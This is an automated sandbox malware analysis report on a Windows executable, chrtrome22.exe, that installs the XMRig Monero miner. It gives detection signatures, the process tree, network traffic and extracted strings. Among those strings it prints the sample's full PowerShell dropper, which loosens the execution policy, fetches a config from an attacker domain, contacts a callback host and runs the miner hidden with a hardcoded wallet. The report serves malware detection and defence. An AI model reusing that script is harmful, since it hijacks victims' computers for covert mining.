Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
chrtrome22.exe

Overview

General Information

Sample name:chrtrome22.exe
Analysis ID:1586514
MD5:ae96b1fb65498cdf458a52bc197466a5
SHA1:c55f2e200b34d90caddb261b971972c97648402f
SHA256:7d54679530cec59ef4c71f059c3b6da8f654e2a316fa4689319db0ab35572880
Tags:CoinMinerexeJalapenomalwaretrojanuser-Joker
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential PowerShell Execution Policy Tampering
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Process Tree

  • System is w10x64
  • chrtrome22.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\chrtrome22.exe" MD5: AE96B1FB65498CDF458A52BC197466A5)
    • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xmrig.exe (PID: 2312 cmdline: "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json MD5: F6D520AE125F03056C4646C508218D16)
      • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\xmrig\xmrig-6.22.2\config.jsonJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\xmrig\xmrig-6.22.2\xmrig.exeJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        C:\xmrig\xmrig-6.22.2\xmrig.exeMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x586958:$a1: mining.set_target
        • 0x581428:$a2: XMRIG_HOSTNAME
        • 0x583500:$a3: Usage: xmrig [OPTIONS]
        • 0x581400:$a4: XMRIG_VERSION
        C:\xmrig\xmrig-6.22.2\xmrig.exeMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
        • 0x58d3a8:$x1: donate.ssl.xmrig.com
        • 0x58d951:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
        C:\xmrig\xmrig-6.22.2\xmrig.exeMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
        • 0x58de98:$s1: %s/%s (Windows NT %lu.%lu
        • 0x58ef00:$s3: \\.\WinRing0_
        • 0x5856f8:$s4: pool_wallet
        • 0x580c68:$s5: cryptonight
        • 0x580c78:$s5: cryptonight
        • 0x580c88:$s5: cryptonight
        • 0x580c98:$s5: cryptonight
        • 0x580cb0:$s5: cryptonight
        • 0x580cc0:$s5: cryptonight
        • 0x580cd0:$s5: cryptonight
        • 0x580ce8:$s5: cryptonight
        • 0x580cf8:$s5: cryptonight
        • 0x580d10:$s5: cryptonight
        • 0x580d28:$s5: cryptonight
        • 0x580d38:$s5: cryptonight
        • 0x580d48:$s5: cryptonight
        • 0x580d58:$s5: cryptonight
        • 0x580d70:$s5: cryptonight
        • 0x580d88:$s5: cryptonight
        • 0x580d98:$s5: cryptonight
        • 0x580da8:$s5: cryptonight

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000002.00000002.4117633923.000002B86C509000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000002.00000000.1753744579.00007FF641770000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000000.00000002.1755040993.0000000002E19000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              00000002.00000002.4117633923.000002B86C5AC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                00000000.00000002.1755040993.0000000002E39000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  Click to see the 13 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  2.0.xmrig.exe.7ff640ec0000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    2.0.xmrig.exe.7ff640ec0000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                    • 0x586958:$a1: mining.set_target
                    • 0x581428:$a2: XMRIG_HOSTNAME
                    • 0x583500:$a3: Usage: xmrig [OPTIONS]
                    • 0x581400:$a4: XMRIG_VERSION
                    2.0.xmrig.exe.7ff640ec0000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                    • 0x58d3a8:$x1: donate.ssl.xmrig.com
                    • 0x58d951:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                    2.0.xmrig.exe.7ff640ec0000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                    • 0x58de98:$s1: %s/%s (Windows NT %lu.%lu
                    • 0x58ef00:$s3: \\.\WinRing0_
                    • 0x5856f8:$s4: pool_wallet
                    • 0x580c68:$s5: cryptonight
                    • 0x580c78:$s5: cryptonight
                    • 0x580c88:$s5: cryptonight
                    • 0x580c98:$s5: cryptonight
                    • 0x580cb0:$s5: cryptonight
                    • 0x580cc0:$s5: cryptonight
                    • 0x580cd0:$s5: cryptonight
                    • 0x580ce8:$s5: cryptonight
                    • 0x580cf8:$s5: cryptonight
                    • 0x580d10:$s5: cryptonight
                    • 0x580d28:$s5: cryptonight
                    • 0x580d38:$s5: cryptonight
                    • 0x580d48:$s5: cryptonight
                    • 0x580d58:$s5: cryptonight
                    • 0x580d70:$s5: cryptonight
                    • 0x580d88:$s5: cryptonight
                    • 0x580d98:$s5: cryptonight
                    • 0x580da8:$s5: cryptonight

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\chrtrome22.exe, ProcessId: 6568, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zw0o1iqr.gns.ps1
                    Sigma detected: Potential PowerShell Execution Policy Tampering
                    Source: Registry Key setAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Details: Unrestricted, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\chrtrome22.exe, ProcessId: 6568, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-09T08:42:15.866225+010020479282Crypto Currency Mining Activity Detected192.168.2.4640141.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-09T08:42:10.487254+010018100002Potentially Bad Traffic192.168.2.449730140.82.121.4443TCP
                    2025-01-09T08:42:11.117698+010018100002Potentially Bad Traffic192.168.2.449731185.199.110.133443TCP
                    2025-01-09T08:42:14.364879+010018100002Potentially Bad Traffic192.168.2.449732172.67.144.26443TCP
                    2025-01-09T08:42:15.520551+010018100002Potentially Bad Traffic192.168.2.449733206.189.156.6980TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: chrtrome22.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeAvira: detection malicious, Label: HEUR/AGEN.1311679
                    Multi AV Scanner detection for dropped file
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeReversingLabs: Detection: 73%
                    Multi AV Scanner detection for submitted file
                    Source: chrtrome22.exeReversingLabs: Detection: 63%
                    Source: chrtrome22.exeVirustotal: Detection: 58%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                    Machine Learning detection for dropped file
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: chrtrome22.exeJoe Sandbox ML: detected

                    Bitcoin Miner

                    barindex
                    Yara detected Xmrig cryptocurrency miner
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.0.xmrig.exe.7ff640ec0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4117633923.000002B86C509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.1753744579.00007FF641770000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1755040993.0000000002E19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4117633923.000002B86C5AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1755040993.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1755040993.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4117633923.000002B86C4DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1755040993.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1755040993.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4117633923.000002B86C52A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1759218717.000000001D265000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1755040993.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: chrtrome22.exe PID: 6568, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xmrig.exe PID: 2312, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 2180, type: MEMORYSTR
                    Source: Yara matchFile source: C:\xmrig\xmrig-6.22.2\config.json, type: DROPPED
                    Source: Yara matchFile source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPED
                    Found strings related to Crypto-Mining
                    Source: xmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: stratum+tcp://
                    Source: xmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: cryptonight/0
                    Source: xmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: stratum+tcp://
                    Source: xmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                    Source: xmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                    Source: chrtrome22.exeString found in binary or memory: # Set Execution PolicySet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted# Variables$xmrigUrl = "https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip"$configUrl = "https://evilbit.pro/config.json"$oastUri = "http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun"$downloadPath = "$env:USERPROFILE\Downloads\xmrig.zip"$installPath = "C:\xmrig"$walletAddress = "45Lu4Zzcp64etdoVnc9jSU84WBygC7p5mdrowZic6LVDZERsDszFgcRcF63Gm6kVc7XsvgpvhH36SNfCmUAb1TwbSG7PVTa"$poolUrl = "pool.supportxmr.com:443"$workerName = "MyWorker"# Download XMRigWrite-Host "Downloading XMRig..."Invoke-WebRequest -Uri $xmrigUrl -OutFile $downloadPath -UseBasicParsing# Extract XMRigWrite-Host "Extracting XMRig..."Add-Type -AssemblyName System.IO.Compression.FileSystem[System.IO.Compression.ZipFile]::ExtractToDirectory($downloadPath, $installPath)# Download config.jsonWrite-Host "Downloading config.json..."$configPath = Join-Path $installPath "xmrig-6.22.2\config.json"Invoke-WebRequest -Uri $configUrl -OutFile $configPath -UseBasicParsing# Make GET request to the specified URIWrite-Host "Making GET request to the URI..."Invoke-WebRequest -Uri $oastUri -UseBasicParsing | Out-Null# Start XMRig in a hidden windowWrite-Host "Starting XMRig in a hidden window..."$xmrigExe = Join-Path $installPath "xmrig-6.22.2\xmrig.exe"Start-Process -FilePath $xmrigExe -ArgumentList "--config=$configPath" -WindowStyle HiddenWrite-Host "XMRig has started mining in a hidden window! Use Task Manager to stop it if needed."
                    Source: chrtrome22.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.144.26:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: chrtrome22.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.dr
                    Source: Joe Sandbox ViewIP Address: 140.82.121.4 140.82.121.4
                    Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
                    Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.4:64014 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49733 -> 206.189.156.69:80
                    Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 140.82.121.4:443
                    Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 185.199.110.133:443
                    Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 172.67.144.26:443
                    Source: global trafficHTTP traffic detected: GET /xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/88327406/cbb07403-ee0c-4c81-9ded-5d5497635b93?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250109%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250109T074210Z&X-Amz-Expires=300&X-Amz-Signature=14b843eca34096be30cd757c45ce4cc4b792e87b295ec80813503823aca60371&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-msvc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /config.json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: evilbit.proConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.funConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/88327406/cbb07403-ee0c-4c81-9ded-5d5497635b93?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250109%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250109T074210Z&X-Amz-Expires=300&X-Amz-Signature=14b843eca34096be30cd757c45ce4cc4b792e87b295ec80813503823aca60371&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-msvc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /config.json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: evilbit.proConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682Host: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.funConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: github.com
                    Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: evilbit.pro
                    Source: global trafficDNS traffic detected: DNS query: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun
                    Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://evilbit.pro
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://objects.githubusercontent.com
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: chrtrome22.exe, chrtrome22.exe, 00000000.00000002.1755040993.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.00000000030C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.00000000030C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun/p
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evilbit.pro
                    Source: chrtrome22.exe, chrtrome22.exe, 00000000.00000002.1755040993.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evilbit.pro/config.json
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002E46000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, pool_mine_example.cmd.0.drString found in binary or memory: https://miningpoolstats.stream/monero
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002E68000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, rtm_ghostrider_example.cmd.0.drString found in binary or memory: https://miningpoolstats.stream/raptoreum
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/cbb07403-ee0c-
                    Source: xmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, xmrig.exe.0.drString found in binary or memory: https://xmrig.com/benchmark/%s
                    Source: xmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, xmrig.exe.0.drString found in binary or memory: https://xmrig.com/docs/algorithms
                    Source: xmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, xmrig.exe.0.drString found in binary or memory: https://xmrig.com/wizard
                    Source: xmrig.exe, 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, xmrig.exe.0.drString found in binary or memory: https://xmrig.com/wizard%s
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.144.26:443 -> 192.168.2.4:49732 version: TLS 1.2

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Reads the Security eventlog
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Reads the System eventlog
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
